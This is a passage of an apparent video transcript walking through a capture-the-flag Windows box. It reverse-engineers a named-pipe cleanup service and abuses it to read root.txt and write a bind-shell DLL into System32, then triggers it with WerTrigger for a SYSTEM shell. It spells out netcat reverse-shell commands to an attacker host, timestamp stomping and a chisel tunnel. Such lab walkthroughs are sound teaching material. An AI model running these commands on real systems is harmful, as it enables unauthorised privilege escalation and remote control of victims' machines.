older than 30 days in that downloads directory, it may do something. Let's see. What is the properties on this for the time? Modified 2020. So maybe it's modified time. I'm going to copy this into my downloads. So users ipsec downloads. And let's see what happens. And it says cleaning c:\users ipsec downloads. It does a clean function and deleted that file. It's no longer in here. If we looked more about that clean function, actually we'd have to reverse the server next to see what it does. I guess we can do that before we look ahead and cheat. So let's go to server.exe. Remember to change this over to GoLang. Okay. Analyze it. Yeah. It's going to take a few seconds, but what this does is puts it in program data. So /program data. And if we go to cleanup, we have a base 64 string. I believe this is encrypted. I think if we looked at the entropy of this, it would be high entropy. Well, we'd have to unhex it and then look at the entropy. But it's just hex. And if we want to unbase64 it, we can do that. Let's just open up CyberChef. Input from base64. We can see that's just the full file name. So going back into here, we have server.exe. So let's look at functions, main, and we have a few things. So there is create server, and it's doing a new named pipe. And where is the length it's setting? Again, we just have this huge thing. And I'm guessing 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11. So is it setting B somewhere? I don't know how it knows this is the length of 8, but this is the pipe name. Oh, here it is, 0xb. So we got the pipe name of it just doing cleanup pipe. Then there's an error, OS exit. So let's look at the clean function to see exactly what this does. So read file. It's going to encrypt it with some private key. So that is the encryption. Base 64 right here. And here we have it doing something to program data and then a string. So that's how we know it's doing something here. If we look at the restore function, it's going to pretty much just unbase 64, unhex, decrypt, and restore it. So let's try using this restore functionality. So we deleted it. If I do -r, let's just say please subscribe. It says restoring please subscribe, and we don't have anything here because that's not deleted. If I restore -r, put the full path, it says it is restoring users ipsec downloads client.exe because that's the file we copied there. And can't find it. Let's see. I wonder if I just give it client.exe. So open cleanup, and it's base 64ing this. So base 64'd client. Let's just make this bigger for you. That may help. Okay. So I wonder if I will have to base 64 encode this. Let's go back here. Instead of from, we can say to, and we'll restore this string. Cannot find the file. Let's look at the cleanup directory, and it actually doesn't exist anymore. So something we did indeed fixed it. That B was me like trying to use tmux commands to switch to this terminal window. I'm going to run this again so we can find out exactly what cleans it up. We probably need to recopy the file into downloads. It exists, but when it copied it over, it put a new timestamp on it. So what I'm going to do, make this, come on. Man, that is a really specific thing to change the size. Let's see, can I just do Windows up? Yeah. Hotkeys are amazing. Until I just send it down. Let's see. Here. There we go. Now we can see everything happening. So I'm going to do client.exe. And it's going to clean downloads. And I'm hitting enter here. I don't know why I have to do that. Something's waiting for user input. I'm guessing when it's running as a service, it's not. But we can see it deleted it from downloads. So I'm going to do a -R. We're just going to pass this entire thing in to see exactly what it says. So downloads client.exe. It's restoring it, and it restored it. So the very first thing I did, it worked. We just don't get a message here saying it restored. We know it's working by named pipes. So what I'm going to do is install named pipe monitor. That's from IO Ninja. I just got the trial of it. So if you just go to downloads, you can download a trial. It's the best tool I know to monitor named pipes. I thought I had it installed. Oh, it's by IONinja, yeah. So we do pipe server and run as administrator and run it. And then we give it a pipe name up here in the top left. If we want to verify what the pipe name was, we think it was cleanup pipe based upon reviewing the source code, but we can verify that pipe exists by get child items and then dot backslash dot pipe backslash, I think. Is it dot backslash pipe like that? Yeah. So we have a list of all the pipes here, and cleanup pipe exists. It's currently a length of 9. So I think there's something waiting to be read then. Let's see. Cleanup pipe. Let's do type dot slash dot pipe. Let's see, is it get content? GCI. That exists. Now the length is 12. I think me trying to read it increased the length. We'll go more into pipes in a bit. But instead of troubleshooting that, let's just put cleanup pipe here and then start listening. So we started and we're listening on the pipe. Let's try cleaning up again. So I'm going to go to my desktop, copy client.exe, put it in downloads. So it has a old timestamp of older than 30 days. And then we run client.exe. It says it cleaned. If we go in here, I could have swore it should output that we had data. Let's try restoring. There we go. So I don't know why the clean didn't happen, but we can see the restore command gets sent. So it says restore and then this and then disconnects. I'm going to try clean again. Because we should see that clean command. I wonder if there's some timing thing. So I don't know if there's a way just to sit on pipe and listen, or I don't know if that's what Pipe Monitor is doing, but you can read a name pipe 2 ways. I forget the names right now. One is just read and clear the pipe, which is the default, but you can spy on a pipe and see if there's data and what that data is and not clear it. So I'm guessing this tool is just reading that pipe on some type of schedule. And there's like a race condition happening. Let's see. Because we should see it issue this clean command. Oh, there we go. So there's the clean, and that disconnects. So this is how we know the 2 commands it sends, clean and restore. So if we restore this, it restores. And we have it. So not sure why we missed that first clean, but we now no longer need client.exe because we can just echo this ourselves. So if I wanted to, let's try that real quick. So let's copy that file back. So downloads. Already old. For some reason it didn't change the timestamp there. That's weird. But we can. Let's try going here. And we can say echo clean test to clean up pipe like that. Network path not found. Let's try putting another backslash here. Think that may work. Didn't have a not found. but we don't have any output. Wonder if we need another backslash. There we go. So we need dot dot slash, like, not sure why. Escaping is hard, but we can now echo commands to this terminal. So we no longer have to wait for the 30 days. I'm not sure exactly what this buys us, but hey, pretty cool. So there's two ways we can abuse this on the server. The first way is a file read vulnerability. And there's probably more than two ways, but we'll go into two. I probably have to get another reverse shell. So let's do inotify like that. I'm in Ghidra, so let's go. Let's see. I want to go. Let's just exit this window. I was like, what's the path? Oh, if I just open the pane again, I'm back. So let's go SMB. We have the SMB server running. We can now do the inotify. And before we do inotify, we probably want to echo something into header.inc that is not PHP. Inotify. This will be read line wrap and the share. So this hopefully still works. Ncat listen. Tampering detected. Let's try again. It is a race condition, so there's always a chance that it does fail. If I get tampering detected again like I did, I'm going to try increasing the sleep. And then I'll try, well, yeah, I think increasing sleep is the only thing that'll work. If I decrease the sleep, then the race happens earlier. And I know I lost the race. I came in second place, not first, because it said tampering detected. If I came in first and was replacing it too quickly, it would tell me, please subscribe here. So now we have this shell. We can clean up root.txt. So I can echo, PowerShell behaves funnily. So I think if I like do this echo command with the client, it's not going to work well. And we actually have to do the echo command. We can't use clean.exe because we want to give it a path that is not in downloads. So what I'm going to do is use nc64. So let's locate nc64.exe. Actually, I can show this echo command failing. Maybe we can do cmd/c to make it not. But let's do echo clean c:\users administrator root desktop root.txt to pipe, and then what was it? Clean up pipe. And if we dir c:\program data cleanup, we don't have anything. I'm going to try doing this in cmd/c, the same command. Still nothing. I'm going to try doing it in a command prompt, not PowerShell. So I'm just copying nc64 from a previous video into this. And then I can do 10.10.14.8 \share and nc64.exe -e cmd 10.10.14.8 9001. This should get us a session. There we go. Notice it doesn't say PowerShell anymore, so I'm not in a PowerShell window. I'm going to go up and we'll just copy this exact command to see if anything different happens. And we may have to base64 encode this now that I'm thinking about it. Data cleanup. So let's try base64 encoding c:\users administrator like this. Actually, we can go to the named pipe. And it is not. It's writing clean this. C:\users ipsec downloads. Let's see. I wonder if I'm not putting the null byte at the end, or 0A. Let's see if I put, let's put period after this or something. We'll just put A. And do a dir. Oh, that was it. So it just needed an extra character. Not exactly sure why. I'm guessing it had to do with that named pipe thing. I guess we can validate that maybe? Let's see. If I go here, let's do echo clean test to name pipe. And I don't see it writing. Do we put in quotes? We connect and disconnect, but we never attempt to write, or it's not capturing the write. I'm going to stop this real quick, and we're going to start up another instance. So desktop server.exe. And we can, let's see, we got that. Start a listener again. And try it. It's actually not right into the pipe. We connect, but never write. So I'm not sure how to debug that. Yeah. So, not sure what's going on there, but we got the file. So let's copy this. So copy C:\program data, clean up this to 10.10.14.8/share. So now this file is in my SMB share. And what I'm going to do is, I don't have a file window open anymore because something weird happened to my taskbar and things crashed. File, let's see. It's a good way to copy this. I have the issue of my VM being on NAT right now, so it's hard for me to copy between hosts and whatnot. I'm going to pause the video and manually copy this file over. Actually, how big is it? Let's see, cd smb. If we base64 the file, yeah, it's pretty small. I don't have to pause the video. I can just copy it this way. Copy. And then let's see. So a way to save this now from base64. That's just, oh, it's just text. That's right. So we can copy this and put this in our program data. And because it uses a static key, we can easily just, what is it? Decrypt it. This is client.exe, I think, right now. So all I'm going to do is edit this. It's opening up a 12 meg file in Notepad. Not great. But we paste the new thing. And this is just the hex of root.txt. And what I'm going to do is use the client to restore the file. So CLS, do I have it here where we're doing client? Yep. So we're restoring client.exe. Let's go back into my downloads, documents. Where is it? users ipsec downloads. I just want to make sure this doesn't exist because I don't know if it will overwrite it. It says it's restoring. It did. It's 1 KB. If we edit with Notepad, we get the hash. So that's one way you could do this thing. We could also abuse symlinks and do it that way from the reverse shell. So going back here, let us do that. We can probably, do we have ownership of this file? I don't think we do. Let's see, I wonder if I can just restore and that will put the file back. Okay, dir:/, what is it? Program data cleanup. File's not there, so I'm assuming root.txt is back on the box. So let's do this without copying it, like copying the file to another VM. So let's go cd users web downloads, because this is where the clean.exe pulls and puts files from. Because we're not using the executable, we actually don't have to do that. But what I'm going to do is mk-link to create a shortcut, and we're going to put it in ipsec and point it to c:\users administrator desktop. And we can see there's now ipsec, which points to the administrator desktop. So now if I echo clean c:\users web downloads ipsec root.txt, and then we have to add another character, oddly. We can do .pipe, cleanup pipe. And if I look at dir:/, program data and cleanup, we have the file here. And this is just pointing to, what is it? Let's just do it. It's pointing to the root.txt that's within my directory. So if I go to, what is it? CyberChef. CyberChef. What is it? CyberChef. Could have swore it would have been like in my history. But input from base64. Because we own this directory, we can just now delete the junction. So rmdir ipsec. And then we make the directory ipsec. And we issue a restore command, because the restore command's going to put it wherever that base64 is. So because the base64 is pointing to a directory we own, now all I do is echo restore, and then the file to the cleanup pipe. And we do a dir, go into ipsec, and we have root.txt. So that is another way we could get around the encryption. But if you don't want to just read a file and you would turn it into a execute, there's a lot of ways that you can turn a elevated write file into code execution. A long time ago, there was the diagnostic hub exploit that is pretty much patched. Essentially, all these utilize DLL injections within System32. So the diagnostic hub, you could overwrite anything in System32 with a DLL and then include it. A lot of people overwrote license.rtf that was in System32 because the file's not needed, so you don't really risk ruining anything. And that file is also not protected by trusted installer or known DLLs, which prevents you overwriting DLLs. So that was just a good candidate for that. Then after that got patched, there was like the USO DLL loader service, and that got patched, and now I think WerTrigger still works on the latest. Let's see, I'm trying to find out a good way to Google this. Elevate write to system Windows. Let's see. It's on like the Red Team Wiki or Hack Tricks, I think. Is it hacktricks.xyz? Let's see. Windows local elevate. Let's see. It's not that page. Is it EOP write system Windows hack tricks? Using tokens. We can probably trick and give it some good words. USO DLL. Payload all the things may have it. Windows elevation. EOP. There we go. Windows subsystem unquoted path. Printers. Privilege file write elevation of privilege. So this is talking about the diagnostic hub, the USO DLL thing I said, and then WerTrigger. And there's a lot of other ones. They always come out when one patches. Some researchers like, oh, you can also do it this way. But this is how we're going to do it. We're going to clone this repo, copy phone.info.dll to system32, replace it, and then execute WerTrigger, and we get a shell as system. So, yeah. Let's start by just going to the GitHub repo and poking around at what that phone info is, because it's going to be executing this DLL. So if I go here, we can go to source, phone info, and look at its code. It says bindshell.cpp, so chances are this is just going to be a bind shell. We could replace this code and edit it to put a reverse shell. If you want to do that, it's a good challenge for you to do. But I'm going to keep it as a bind shell, and we'll just connect to it to minimize having to open up Visual Studio and everything. I've done similar things. If you search ipsec.rocks, it should be relatively easy to find the code. But here we are running a bind shell on port leet. So we know what phone info does. So let's just see. We don't have releases here, but we have exes. So we can just copy everything with a git clone. So I'm going to get out of that. We can git clone, WerTrigger, and then let's see, what do we have to do? We have to place phone info.dll in C:\Windows system32. So the first thing I'm going to do is do a dir C:\Windows system32. Oh god, there's a lot. Phone info. It doesn't exist, so we don't have it in there yet. Let us download it into this downloads directory, so we can copy 10.10.14.8/share/phone info.dll, and we can cp WerTrigger phone info into our SMB directory. So if I dir now, we have phone info.dll. I'm guessing it is old, so, well, I mean, new, because looking at this timestamp, it's today. So either we have to manually stomp the time and edit the time back, or we can just do echo and do it manually. We already did it manually before, so let's go the other route and change the timestamp back. And for this, I want to be in PowerShell. It looks like we can just type PowerShell to get there. So I'm going to do a get item, and it's phone info.dll. And I think do I have to put that in quotes? I don't know. I'm going to. And then we can just set last write time is equal to get date, and we'll set it to 7/14/2000. Just a date that is way back there. If I do a dir now, we can see the last write time was successfully set. We can also change like the creation time. So we can do creation time, and let's do last access time. Okay. If we do this get item command, oh shoot, I don't know what I was trying to do. Its last write time is old. So now when we run the cleanup script, it should clean it up. So let's test that. cd /program1 cleanup /client.exe. So it did a cleaning SQL and users web downloads. And now if I go cd /program data cleanup, we have this file. And I'm guessing if we look at this path in CyberChef, it is c:\users web phone info.dll. What we want to do is change this. So we'll go to base64, copy this, and we want to put it c:\Windows system32. Okay, so I should be able to just copy and that to this. If I dir, now we have this. So if we go back to the cleanup program, so cd program1 cleanup, we can do client.exe -R for restore, and copy this. dir, let's just go into the cleanup one last time, hopefully. And that one is missing. So we got two things here, and none of them are the ones we care about. So we can see what it is. This one is desktop.ini, and this one is one in downloads. So if I dir c:\Windows system 32 find string for, was it phone info? Watch it not show up. Yep, there it is. And created today at 9:14. So we have phoneinfo.dll in there. Let us go to the script to see what it says to do. So we copy it here, place report.wer and WerTrigger in the same directory, then run WerTrigger. Okay, so let's go back to users web downloads, I guess. And we need to copy those files. So cp WerTrigger / this and report, and then copy 10.10.14.8 share WerTrigger.exe, and then the next one we need is report. Report.wer, and then it just says run this program. So we run it and we'll see what happens. I was half expecting to get some output, but it doesn't look like we are getting output, and it just closed. That was rude. Let's get our shell again. It closed both of my shells. So let's see. This one needs to be the inject. So Python 3 inject.py. Let's see. Echo please to header. Let's redo that. Here we go. Wait. Shell 10.10.14.8 / share. I think that's all we did. Let's see. Close. There we go. Got a connection. So the first thing, I just want to do netstat to see if we're listening on a port. I don't see us listening on lead. Bummer. So I'm going to manually step through this exploit to see what it does. So if I go to source, WerTrigger, and we just do WerTrigger.cpp, we can see first it's going to create this directory. So let's see if this directory exists. cd /program data, Microsoft, Windows, WER, and it was report Q. Nothing here. So we can make the directory ABCDE. Okay. And it's copying report.wer into this directory. So let's go here, copy C:, probably just easier to do it this way. Okay, we copied that. And then let's see. It's running this scheduled task. And then deleting it. So if I run this task, do a netstat-an, do we have leet? We do not. So we probably did something wrong, or that phone info.dll is wrong. I'm going to try running netstat again, just in case it took some time for us to get a reverse shell. And still don't see anything. If I do a dir, GCI, does my directory no longer exist? ABCD does. I don't think the report.wer file exists anymore, though. This is behaving really weirdly. Let's try copying it again, and then if this doesn't work, I'm going to do this from a command prompt instead of PowerShell. dir. I'm not sure, yeah. Weird. Where's CMD? There it is. And just give it a second. Netstat. I didn't do AN. It's probably doing a bunch of DNS queries, and we'll just hang for a little bit. Right now I'm weighing the option. Do we just get the shell again? Let's see. Echo, please, to header. Let's just get this shell again. Notify wait. Okay. Close. There we go. Let's do GCI C:, what is it? Program data, Microsoft, Windows, WER, report Q, A, B, C, D, E. Showing that directory is empty. Test definitely does exist. Copying this. I wonder if Defender's deleting this file. There, report.wer exist. Okay, we can run that cmd command again. Port.wer exist, netstat-an, is it netstat-ano? There we go. Still not listening on leet. Report.wer does exist in here, though. Let's see. Why not? Did I not copy a double quote? let's see. Port. Wonder if I just revert the box if I'll have better luck. dir Windows system 32 line string phone info. Let's just make sure this file still exists. It does. Let's see. Well, I don't have to escape these. I wonder if that's it. Report.wr still exists. And I still don't have that port listening. So cmd/c, scheduled tasks, run tn. Let's see. Get rid of the escapes. There we go. So in this code, it had to do more escapes because backslash an escape character and echo, when I do it this way in command prompt, it's not treating these as escapes. So I was just doing a bad command. So we're running the Windows error reporting queue, and if we did 2 slashes here, it breaks. But maybe that makes sense, maybe it doesn't. There's difference between doing things in command prompt and not. But if I echo test/test, yeah. If I did that in like Python or something, I'm guessing it would escape. Live demos are the worst. Print test /test like this. End it. Yeah. So it treated this as a special character. If we do test //, that works. But in our command prompt, it put 2 backslashes, and that was causing the command to fail. So sometimes when you copy things out of code, you just have to do those subtle changes. So now that we have netcat running, I can just execute it. So 10.10.14.8/nc64.exe, connect to localhost on port leet, dir, who am I, web. Did that not work? And it's still listening, so I don't know if I actually connected to it. And I wonder if me being in this weird terminal is causing that issue. 10.10.14.8 nc64.exe. That would exist here. Yes. We're going to do something really silly. Let's send this connection. So -e cmd 10.10.14.8 port 9001. So now I have what I would assume to be a shell, but I don't. Oh, shoot. I know what I did wrong. We had to specify /share. Yeah. dir. We connected to the shell this time, I think. But my assumption right now is something happened with like our TTY and it's not doing a good job at redirecting. Maybe it would have been easier not to be lazy and just replace the reverse shell with, what is it? Replace the bind shell with the reverse shell. That may be easier at this point. Share That's what happens when you're lazy. Oftentimes, you're like, you know what? I don't want to do that. I can do it this way. And then you spend more time troubleshooting, doing it slightly off than what you're used to. Share nc64.exe -e cmd 10.10.14.8 9001. So I think this is a more proper like setup shell. We now need to make sure our bind shell is still running. Oh shoot. It is, but it's got a connection tied to it. Task list nc64. How many are there? There's 2. Which one am I? It's a 50-50 chance I'm going to get it wrong. Task kill. Let's just do all of them. I am nc64.exe/f. Is that going to do it? I think I just killed all the reverse shells with using nc. Let's get this one last time, I hope. Let's see. This was RL wrap. This was inotify wait. Ten 14.8 share. Let's hope this works now. Closed. We have a session. Task list. nc64.exe. Not listening. Netstat ANO. Leet is listening. Awesome. This is what we want. So now we can get this reverse shell again. So 10.10.14.8 /share nc64.exe dash, what is it? ecmd 10.10.14.8 9001. We'll get this, and if this doesn't work, I'm probably just going to use chisel and forward port 1337 back to myself, because we're doing it this way. I'm not going to do a reverse shell. It's in my head that I'm going to get this working. 127.0.0.1 1337 dir. Hey, who am I? Proper web. That didn't work. Netstat-ANO. It's not listening anymore. Let's just run this command again. Where is it? This. I guess first we should go into this directory. CD program data, Microsoft Windows, CD WER, report Q, CD WER, report Q. Wait. Access denied now. What? I was in that directory before. Program data, Microsoft Windows WER. This is bizarre. Do I not have access to the directory because I'm in PowerShell? Let's just try running this and hope the report.wer still exists. So we can get rid of that. Shoot, that was Windows. Tempted. Let's see. I may have to revert this box. Because it's no longer listening on leet, and I can't go into the report queue. If I exit that, I wonder if we can go in here, cd / program data windows wer. What is the directory? Port Q, A, B, C, D, E. So I can exit when I'm in PowerShell. This is becoming one of the weirder exploits. So let's run this. Okay, I think, wait, now it's pulling leet from a different session. Let's see. Wonder if I move A, B, C, D, E to B, C, D, E, F. Port.where exist. I'm assuming it doesn't need to be A, B, C, D, E, and this was just a random name chosen. So now if I do netstat ANO, do I have leet? I can probably just do find string. Find str 1337. No. Well, this is a bummer. Schedule task run. Did not escape anything. See, just going to copy this again and do it one last time for a sanity check. Copy. I'm going to revert the box. I'm going to just try it. So I reverted the box and then did all the steps to get report.wer in my downloads directory and phone info inside of system32. So if I do find string phone, we should have it here. And then we're going to try this again and use chisel to for the port, because I'm not trusting how this TTY is acting. So let's go into, what was it? If we go back here, WerTrigger, we want to go into program data, report queue, CD, I wonder if I can do that. Nope. So, oh, I have two CDs. dir. Does not like the double backslashes, as I guess we kind of expected that. So get rid of them. And we can make dir A, B, C, D, E. And then we copy my report.wer into this directory. CD, A, B, C, D, E. Okay. And we should be able to run our task. So let's get rid of the escapes. Okay. Netstat-ANO, find string leet, please be listening. It is. So now let us get chisel. So locate chisel. We have an exe and a AMD. So let's copy these here. If you don't know what chisel is, if you just go to ipsec.rocks and look at the Reddish video, that's why I explain it the best. And I have not actually ran it, so we're going to see how this goes. The video's any indication, it's not going to go well. But let's do chmod plus x, chisel, and let's do server port 8000, allow reverse. Okay. And here we should be able to execute the chisel client. So 10.10.14.8 / chisel.exe client. We want to connect to 10.10.14.8 port 8000. Then create a reverse connection. I'm just going to do leet on both. 127.0.0.1 leet. So hopefully this connects back. Did not look like it connected to me. Let's go users, web downloads. I'm just going to copy chisel. Actually, I don't have \share. I've made that mistake a few times, I think, this video. Let's try it that way. Are you going to connect? Thinking about it, I probably should have copied the binary to the box and then execute it, because it is GoLang, so it is a large binary by the definition of binaries. It's probably not all that big. Chisel.exe, 8.5 megs. But it is taking its sweet time. So I'm going to pause the video and we'll see what happens. Almost as soon as I pause the video, we have it connecting. So if I go to my host, we can do sslntp grep for leet, and I am listening on leet. So if I connect to this 127.0.0.1 leet, it should send me through the chisel connection and then go to localhost on the remote host and access port leet. dir. So it's doing exactly what it had done before. So I wonder if this phone info.dll just isn't working. Who am I? Broken pipe. This may really suck. Because if it's happening what I think just happened, the box may not be exploitable again through this. Who am I? nc-zv. Oh. Of course, netcat's always going to be open, but this n may not be. Our lwrap. Let's see. Echo, inotify, run. Let's see if this works. Get my shell, netstat ANO, find string, leet. It is just listening. So that is better than I expected. I'm going to copy chisel to this box. So let's go users web downloads, cp 10.10.14.8, shared chisel.exe. And let's see, chisel.exe, where's the command where I ran it? Let's do here, cop 001. That may be it. I don't know if that's just my tmux like glitching and deleting a character, or I actually forgot to type 1. Let's start up my chisel server. Connect. Wait, what? I thought I was in users web downloads. I must just be on like autopilot and screwing up all over the place. I could have swore I was in this directory, but maybe I typoed and didn't notice. So, indeed, I forgot the 1. Oddly enough, it still connects. So I'm doing a second chisel, and we forwarded port 1338 on our host to Leet. And what do you know? When I do it correctly, it works. So cd administrator, desktop, and we can get root.txt with code execution. So hope you guys enjoyed the video. Take care, and I will see you all next week.